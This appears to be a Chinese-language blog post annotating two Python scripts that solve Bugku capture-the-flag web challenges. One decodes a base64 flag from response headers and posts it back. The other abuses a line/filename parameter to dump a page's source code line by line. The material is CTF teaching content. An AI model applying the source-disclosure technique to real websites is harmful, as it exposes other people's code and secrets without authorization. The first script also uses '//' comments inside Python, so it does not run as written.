bugku題中的python腳本解釋

bugku-速度要快

#-*- coding:utf-8-*-

import requests   //get，post方法
import base64    //base64加解密模塊
url="http://xxx.ddd.dg:8002/web6/"
r=requests.session()   //建立session
headers=r.get(url).headers  //用get方式獲取url的headers信息，由於flag在headers
mid=base64.b64decode(headers['flag'])  //將headers中的flag用base64解碼,解碼後的類型爲bytes
mid=mid.decode()  //以字符串編碼（默認）的方法解碼字符串，

flag=base64.b64decode(mid.split(':')[1])//選用的密文是加密了兩次，第一次解密後的密文格式是flag:xxx,因此獲取的是:後的值，[1]表示選取第2個分片（從0開始）
data={'margin':flag}  //這個是傳值給margin
print(r.post(url,data).text)//post方法傳上去

————————————————————————————————————————————————————————————————

bugku-cookie欺騙

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date    : 2017-10-28 09:36:41
# @Author  : csu_vc
# @Link    : http://blog.csdn.net/csu_vc


import requests
s=requests.Session()
url='http://123.206.87.240:8002/web11/index.php'  
for i in range(1,20):   #在範圍1到20內遍歷
   # payload={'line':str(i),'filename':'aW5kZXgucGhw'}
   # a=s.get(url,params=payload ).content                                  #能夠用這種表示發法
    a=s.get(url,params={'line':str(i),'filename':'aW5kZXgucGhw'}).content    #也能夠用這種表示方法，content
    content=str(a,encoding="utf-8")
    #print(content)
    f = open("model_Weight1.txt",'a')
    f.write(content)
    f.write('\n')